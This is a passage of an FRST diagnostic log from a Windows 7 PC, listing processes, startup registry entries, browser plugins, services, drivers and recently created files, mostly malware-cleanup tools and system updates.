(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Nalpeiron Ltd.) C:\Windows\SysWOW64\nlssrv32.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Sentelic Corporation) C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
(SRS Labs, Inc.) C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
() C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
(GARMIN Corp.) C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(VIZIO Computer Inc.) C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
() C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [FspUip] => C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe [5406104 2012-05-01] (Sentelic Corporation)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe [2170752 2012-05-09] (SRS Labs, Inc.)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [1020064 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [800416 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [462712 2012-03-09] ()
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-26] (Intel Corporation)
HKLM-x32\...\Run: [OSD Utility] => C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe [7892992 2012-04-27] (VIZIO Computer Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\Run: [ANT Agent] => C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe [14731776 2013-02-15] (GARMIN Corp.)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_167_ActiveX.exe [854704 2014-09-23] (Adobe Systems Incorporated)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [260928 2012-03-14] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [215360 2012-03-14] (NVIDIA Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x7EF78E2F6EF8CF01
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.200.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
Chrome:
=======
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [106144 2012-02-13] (Atheros Commnucations) [File not signed]
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1337752 2013-09-12] (ESET)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-03-28] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165144 2012-03-28] (Intel Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [66560 2012-11-12] (Nalpeiron Ltd.) [File not signed]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2011-03-01] (Microsoft Corporation)
R3 CirrusLFD; C:\Windows\System32\DRIVERS\CSLFDx64.sys [35840 2012-04-02] (Cirrus Logic)
S3 ESETOlmarikOlmascoCleaner; C:\Windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys [156360 2014-04-11] ()
S3 libusb0; C:\Windows\System32\DRIVERS\libusb0.sys [44480 2011-05-17] (http://libusb-win32.sourceforge.net)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-11-03] ()
R3 ViWDM; C:\Windows\System32\DRIVERS\ViWDM.SYS [14336 2012-03-07] (Primax Electronics Ltd.)
R3 vrvd5; C:\Windows\System32\DRIVERS\vrvd5.sys [13344 2014-04-15] (Rsupport Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-07 18:13 - 2014-11-07 18:13 - 14439144 _____ (Malwarebytes Corp.) C:\Users\Ryan\Desktop\mbar-1.08.0.1001.exe
2014-11-07 16:07 - 2014-11-07 16:07 - 00328126 _____ () C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe_20141107.160712.11600.log
2014-11-07 16:06 - 2014-11-07 16:07 - 00328192 _____ () C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe_20141107.160632.9176.log
2014-11-07 15:57 - 2014-11-07 15:57 - 04184008 _____ (Kaspersky Lab ZAO) C:\Users\Ryan\Desktop\tdsskiller.exe
2014-11-07 15:57 - 2014-11-07 15:57 - 00186568 _____ (ESET) C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe
2014-11-07 15:53 - 2014-11-07 15:53 - 00000000 ___RD () C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2014-11-03 21:28 - 2014-11-03 21:28 - 00002159 _____ () C:\Users\Ryan\AppData\Local\recently-used.xbel
2014-11-03 20:24 - 2014-11-03 20:25 - 00000000 ____D () C:\Users\Ryan\AppData\Local\{9B1BF085-634B-426D-BDB3-489C0053B60E}
2014-11-03 18:29 - 2014-11-03 18:29 - 00000632 _____ () C:\Users\Ryan\Desktop\JRT.txt
2014-11-03 18:26 - 2014-11-03 18:26 - 01706359 _____ (Thisisu) C:\Users\Ryan\Desktop\JRT.exe
2014-11-03 18:25 - 2014-11-03 18:25 - 00000730 _____ () C:\Users\Ryan\Desktop\AdwCleaner[S0].txt
2014-11-03 18:20 - 2014-11-03 18:22 - 00000000 ____D () C:\AdwCleaner
2014-11-03 18:20 - 2014-11-03 18:20 - 01375089 _____ () C:\Users\Ryan\Desktop\AdwCleaner.exe
2014-11-03 18:19 - 2014-11-03 18:19 - 00004981 _____ () C:\Users\Ryan\Desktop\RKreport_SCN_11032014_181839.log
2014-11-03 18:14 - 2014-11-03 18:14 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-11-03 18:14 - 2014-11-03 18:14 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-11-03 18:13 - 2014-11-03 18:13 - 14670424 _____ () C:\Users\Ryan\Desktop\RogueKiller.exe
2014-11-03 15:20 - 2014-11-03 15:20 - 00019461 _____ () C:\ComboFix.txt
2014-11-03 15:11 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-11-03 15:11 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-11-03 15:11 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-11-03 15:11 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-11-03 15:09 - 2014-11-03 15:20 - 00000000 ____D () C:\Qoobox
2014-11-03 15:09 - 2014-11-03 15:19 - 00000000 ____D () C:\Windows\erdnt
2014-11-03 15:08 - 2014-11-03 15:08 - 05591672 ____R (Swearware) C:\Users\Ryan\Desktop\ComboFix.exe
2014-11-02 22:52 - 2014-11-02 22:52 - 00002392 _____ () C:\Users\Ryan\Desktop\aswMBR.txt
2014-11-02 22:52 - 2014-11-02 22:52 - 00000512 _____ () C:\Users\Ryan\Desktop\MBR.dat
2014-11-02 22:25 - 2014-11-02 22:26 - 05192704 _____ (AVAST Software) C:\Users\Ryan\Desktop\aswMBR.exe
2014-11-02 22:23 - 2014-11-07 18:13 - 00014096 _____ () C:\Users\Ryan\Desktop\FRST.txt
2014-11-02 22:23 - 2014-11-07 17:47 - 00024924 _____ () C:\Users\Ryan\Desktop\Addition.txt
2014-11-02 22:18 - 2014-11-07 18:13 - 00000000 ____D () C:\FRST
2014-11-02 22:17 - 2014-11-02 22:18 - 02114560 _____ (Farbar) C:\Users\Ryan\Desktop\FRST64.exe
2014-11-01 22:30 - 2014-11-01 22:31 - 00001058 _____ () C:\DelFix.txt
2014-10-30 20:53 - 2014-11-01 22:30 - 00000000 ____D () C:\Windows\ERUNT
2014-10-30 00:30 - 2014-10-30 00:30 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-RYAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
2014-10-30 00:28 - 2014-10-30 00:28 - 00000000 ____D () C:\RegBackup
2014-10-30 00:27 - 2014-10-30 00:27 - 00002246 _____ () C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2014-10-30 00:27 - 2014-10-30 00:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-10-30 00:27 - 2014-10-30 00:27 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-10-29 18:45 - 2014-10-29 18:45 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Mozilla
2014-10-15 15:38 - 2014-10-15 15:38 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-15 15:38 - 2014-10-15 15:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-10-15 15:38 - 2014-10-15 15:38 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-14 19:39 - 2014-10-20 21:01 - 00000000 ____D () C:\Users\Ryan\Desktop\masque of red death
2014-10-14 15:21 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 15:21 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 15:21 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 05552056 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 15:21 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 15:21 - 2014-07-06 20:41 - 03975096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 15:21 - 2014-07-06 20:41 - 03919288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 15:21 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 15:21 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 15:21 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 15:20 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-14 15:20 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-14 15:20 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-14 15:20 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-14 15:20 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-14 15:20 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-14 15:20 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-14 15:20 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-14 15:20 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-14 15:20 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-14 15:20 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-14 15:20 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-14 15:20 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-14 15:20 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-14 15:20 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-14 15:20 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-14 15:20 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-14 15:20 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-14 15:20 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-14 15:20 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-14 15:20 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-14 15:20 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-14 15:20 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-14 15:20 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-14 15:20 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-14 15:20 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-14 15:20 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-14 15:20 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-14 15:20 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-14 15:20 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-14 15:20 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-14 15:20 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-14 15:20 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-14 15:20 - 2014-08-18 22:08 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 15:20 - 2014-08-18 22:08 - 00617376 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 15:20 - 2014-08-18 22:05 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 15:20 - 2014-08-18 22:05 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 15:20 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
